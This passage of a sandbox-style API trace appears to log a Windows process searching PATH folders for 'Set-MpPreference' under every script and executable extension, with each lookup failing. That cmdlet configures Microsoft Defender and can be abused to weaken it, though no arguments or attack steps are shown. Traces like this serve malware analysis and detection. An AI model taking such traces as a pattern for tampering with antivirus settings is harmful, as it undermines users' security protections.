nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.828] GetLastError () returned 0x2 [0156.829] SetErrorMode (uMode=0x1) returned 0x1 [0156.829] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.CMD", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.829] GetLastError () returned 0x2 [0156.829] SetErrorMode (uMode=0x1) returned 0x1 [0156.829] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.829] GetLastError () returned 0x2 [0156.829] SetErrorMode (uMode=0x1) returned 0x1 [0156.829] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.829] GetLastError () returned 0x2 [0156.829] SetErrorMode (uMode=0x1) returned 0x1 [0156.829] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.829] GetLastError () returned 0x2 [0156.829] SetErrorMode (uMode=0x1) returned 0x1 [0156.830] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.VBE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.830] GetLastError () returned 0x2 [0156.830] SetErrorMode (uMode=0x1) returned 0x1 [0156.830] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.830] GetLastError () returned 0x2 [0156.830] SetErrorMode (uMode=0x1) returned 0x1 [0156.830] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.830] GetLastError () returned 0x2 [0156.830] SetErrorMode (uMode=0x1) returned 0x1 [0156.830] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.830] GetLastError () returned 0x2 [0156.830] SetErrorMode (uMode=0x1) returned 0x1 [0156.831] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.831] GetLastError () returned 0x2 [0156.831] SetErrorMode (uMode=0x1) returned 0x1 [0156.831] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.831] GetLastError () returned 0x2 [0156.831] SetErrorMode (uMode=0x1) returned 0x1 [0156.831] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.831] GetLastError () returned 0x2 [0156.831] SetErrorMode (uMode=0x1) returned 0x1 [0156.831] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.831] GetLastError () returned 0x2 [0156.831] SetErrorMode (uMode=0x1) returned 0x1 [0156.832] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.832] GetLastError () returned 0x2 [0156.832] SetErrorMode (uMode=0x1) returned 0x1 [0156.832] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.832] GetLastError () returned 0x2 [0156.832] SetErrorMode (uMode=0x1) returned 0x1 [0156.832] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.832] GetLastError () returned 0x2 [0156.832] SetErrorMode (uMode=0x1) returned 0x1 [0156.832] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.832] GetLastError () returned 0x2 [0156.832] SetErrorMode (uMode=0x1) returned 0x1 [0156.832] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.833] GetLastError () returned 0x2 [0156.833] SetErrorMode (uMode=0x1) returned 0x1 [0156.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.833] GetLastError () returned 0x2 [0156.833] SetErrorMode (uMode=0x1) returned 0x1 [0156.833] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.834] GetLastError () returned 0x2 [0156.835] SetErrorMode (uMode=0x1) returned 0x1 [0156.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.835] GetLastError () returned 0x2 [0156.835] SetErrorMode (uMode=0x1) returned 0x1 [0156.835] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.836] GetLastError () returned 0x2 [0156.837] SetErrorMode (uMode=0x1) returned 0x1 [0156.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.837] GetLastError () returned 0x2 [0156.837] SetErrorMode (uMode=0x1) returned 0x1 [0156.837] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.838] GetLastError () returned 0x2 [0156.839] SetErrorMode (uMode=0x1) returned 0x1 [0156.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.839] GetLastError () returned 0x2 [0156.839] SetErrorMode (uMode=0x1) returned 0x1 [0156.839] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.840] GetLastError () returned 0x2 [0156.840] SetErrorMode (uMode=0x1) returned 0x1 [0156.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.841] GetLastError () returned 0x2 [0156.841] SetErrorMode (uMode=0x1) returned 0x1 [0156.841] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.842] GetLastError () returned 0x2 [0156.842] SetErrorMode (uMode=0x1) returned 0x1 [0156.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.843] GetLastError () returned 0x2 [0156.843] SetErrorMode (uMode=0x1) returned 0x1 [0156.843] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.844] GetLastError () returned 0x2 [0156.845] SetErrorMode (uMode=0x1) returned 0x1 [0156.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.845] GetLastError () returned 0x2 [0156.845] SetErrorMode (uMode=0x1) returned 0x1 [0156.845] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.846] GetLastError () returned 0x2 [0156.847] SetErrorMode (uMode=0x1) returned 0x1 [0156.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.847] GetLastError () returned 0x2 [0156.847] SetErrorMode (uMode=0x1) returned 0x1 [0156.847] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.848] GetLastError () returned 0x2 [0156.849] SetErrorMode (uMode=0x1) returned 0x1 [0156.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.849] GetLastError () returned 0x2 [0156.849] SetErrorMode (uMode=0x1) returned 0x1 [0156.849] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.851] GetLastError () returned 0x2 [0156.851] SetErrorMode (uMode=0x1) returned 0x1 [0156.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.851] GetLastError () returned 0x2 [0156.851] SetErrorMode (uMode=0x1) returned 0x1 [0156.851] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.900] GetLastError () returned 0x2 [0156.900] SetErrorMode (uMode=0x1) returned 0x1 [0156.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.900] GetLastError () returned 0x2 [0156.900] SetErrorMode (uMode=0x1) returned 0x1 [0156.900] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.902] GetLastError () returned 0x2 [0156.902] SetErrorMode (uMode=0x1) returned 0x1 [0156.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.902] GetLastError () returned 0x2 [0156.902] SetErrorMode (uMode=0x1) returned 0x1 [0156.902] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.904] GetLastError () returned 0x2 [0156.904] SetErrorMode (uMode=0x1) returned 0x1 [0156.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.904] GetLastError () returned 0x2 [0156.904] SetErrorMode (uMode=0x1) returned 0x1 [0156.904] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.906] GetLastError () returned 0x2 [0156.906] SetErrorMode (uMode=0x1) returned 0x1 [0156.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.906] GetLastError () returned 0x2 [0156.906] SetErrorMode (uMode=0x1) returned 0x1 [0156.906] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.908] GetLastError () returned 0x2 [0156.908] SetErrorMode (uMode=0x1) returned 0x1 [0156.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0156.908] GetLastError () returned 0x2 [0156.908] SetErrorMode (uMode=0x1) returned 0x1 [0156.908] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.909] GetLastError () returned 0x2 [0156.910] SetErrorMode (uMode=0x1) returned 0x1 [0156.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.910] GetLastError () returned 0x2 [0156.910] SetErrorMode (uMode=0x1) returned 0x1 [0156.910] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.910] GetLastError () returned 0x2 [0156.910] SetErrorMode (uMode=0x1) returned 0x1 [0156.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.910] GetLastError () returned 0x2 [0156.910] SetErrorMode (uMode=0x1) returned 0x1 [0156.910] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.911] GetLastError () returned 0x2 [0156.911] SetErrorMode (uMode=0x1) returned 0x1 [0156.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.911] GetLastError () returned 0x2 [0156.911] SetErrorMode (uMode=0x1) returned 0x1 [0156.911] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.911] GetLastError () returned 0x2 [0156.911] SetErrorMode (uMode=0x1) returned 0x1 [0156.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.911] GetLastError () returned 0x2 [0156.911] SetErrorMode (uMode=0x1) returned 0x1 [0156.911] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.911] GetLastError () returned 0x2 [0156.912] SetErrorMode (uMode=0x1) returned 0x1 [0156.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.912] GetLastError () returned 0x2 [0156.912] SetErrorMode (uMode=0x1) returned 0x1 [0156.912] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.912] GetLastError () returned 0x2 [0156.912] SetErrorMode (uMode=0x1) returned 0x1 [0156.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.912] GetLastError () returned 0x2 [0156.912] SetErrorMode (uMode=0x1) returned 0x1 [0156.912] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.912] GetLastError () returned 0x2 [0156.913] SetErrorMode (uMode=0x1) returned 0x1 [0156.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.913] GetLastError () returned 0x2 [0156.913] SetErrorMode (uMode=0x1) returned 0x1 [0156.913] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.913] GetLastError () returned 0x2 [0156.913] SetErrorMode (uMode=0x1) returned 0x1 [0156.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.913] GetLastError () returned 0x2 [0156.913] SetErrorMode (uMode=0x1) returned 0x1 [0156.913] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.913] GetLastError () returned 0x2 [0156.913] SetErrorMode (uMode=0x1) returned 0x1 [0156.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.914] GetLastError () returned 0x2 [0156.914] SetErrorMode (uMode=0x1) returned 0x1 [0156.914] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.914] GetLastError () returned 0x2 [0156.914] SetErrorMode (uMode=0x1) returned 0x1 [0156.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.914] GetLastError () returned 0x2 [0156.914] SetErrorMode (uMode=0x1) returned 0x1 [0156.914] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.914] GetLastError () returned 0x2 [0156.914] SetErrorMode (uMode=0x1) returned 0x1 [0156.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.915] GetLastError () returned 0x2 [0156.915] SetErrorMode (uMode=0x1) returned 0x1 [0156.915] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.915] GetLastError () returned 0x2 [0156.915] SetErrorMode (uMode=0x1) returned 0x1 [0156.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.915] GetLastError () returned 0x2 [0156.915] SetErrorMode (uMode=0x1) returned 0x1 [0156.915] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.915] GetLastError () returned 0x2 [0156.915] SetErrorMode (uMode=0x1) returned 0x1 [0156.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.915] GetLastError () returned 0x2 [0156.916] SetErrorMode (uMode=0x1) returned 0x1 [0156.916] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.916] GetLastError () returned 0x2 [0156.916] SetErrorMode (uMode=0x1) returned 0x1 [0156.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.916] GetLastError () returned 0x2 [0156.916] SetErrorMode (uMode=0x1) returned 0x1 [0156.916] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.916] GetLastError () returned 0x2 [0156.917] SetErrorMode (uMode=0x1) returned 0x1 [0156.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0156.917] GetLastError () returned 0x2 [0156.917] SetErrorMode (uMode=0x1) returned 0x1 [0156.917] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.917] GetLastError () returned 0x2 [0156.917] SetErrorMode (uMode=0x1) returned 0x1 [0156.917] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.917] GetLastError () returned 0x2 [0156.917] SetErrorMode (uMode=0x1) returned 0x1 [0156.917] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.ps1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.918] GetLastError () returned 0x2 [0156.918] SetErrorMode (uMode=0x1) returned 0x1 [0156.918] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.918] GetLastError () returned 0x2 [0156.918] SetErrorMode (uMode=0x1) returned 0x1 [0156.918] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.psm1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.920] GetLastError () returned 0x2 [0156.920] SetErrorMode (uMode=0x1) returned 0x1 [0156.920] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.920] GetLastError () returned 0x2 [0156.920] SetErrorMode (uMode=0x1) returned 0x1 [0156.920] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.psd1", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.922] GetLastError () returned 0x2 [0156.922] SetErrorMode (uMode=0x1) returned 0x1 [0156.922] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.922] GetLastError () returned 0x2 [0156.922] SetErrorMode (uMode=0x1) returned 0x1 [0156.922] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.COM", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.924] GetLastError () returned 0x2 [0156.924] SetErrorMode (uMode=0x1) returned 0x1 [0156.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.924] GetLastError () returned 0x2 [0156.924] SetErrorMode (uMode=0x1) returned 0x1 [0156.924] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.EXE", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.926] GetLastError () returned 0x2 [0156.926] SetErrorMode (uMode=0x1) returned 0x1 [0156.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.926] GetLastError () returned 0x2 [0156.926] SetErrorMode (uMode=0x1) returned 0x1 [0156.926] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.BAT", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.928] GetLastError () returned 0x2 [0156.928] SetErrorMode (uMode=0x1) returned 0x1 [0156.928] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client", nBufferLength=0x105, lpBuffer=0x601ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Client", lpFilePart=0x0) returned 0x2d [0156.928] GetLastError () returned 0x2 [0156.928] SetErrorMode (uMode=0x1) returned 0x1 [0156.928] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\Set-MpPreference.CMD", lpFindFileData=0x55fe10 | out: lpFindFileData=0x55fe10) returned 0xffffffff [0156.930] GetLastError () returned 0x2 [0156.930] SetErrorMode (uMode=0x1) returned 0x1 [0156.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft 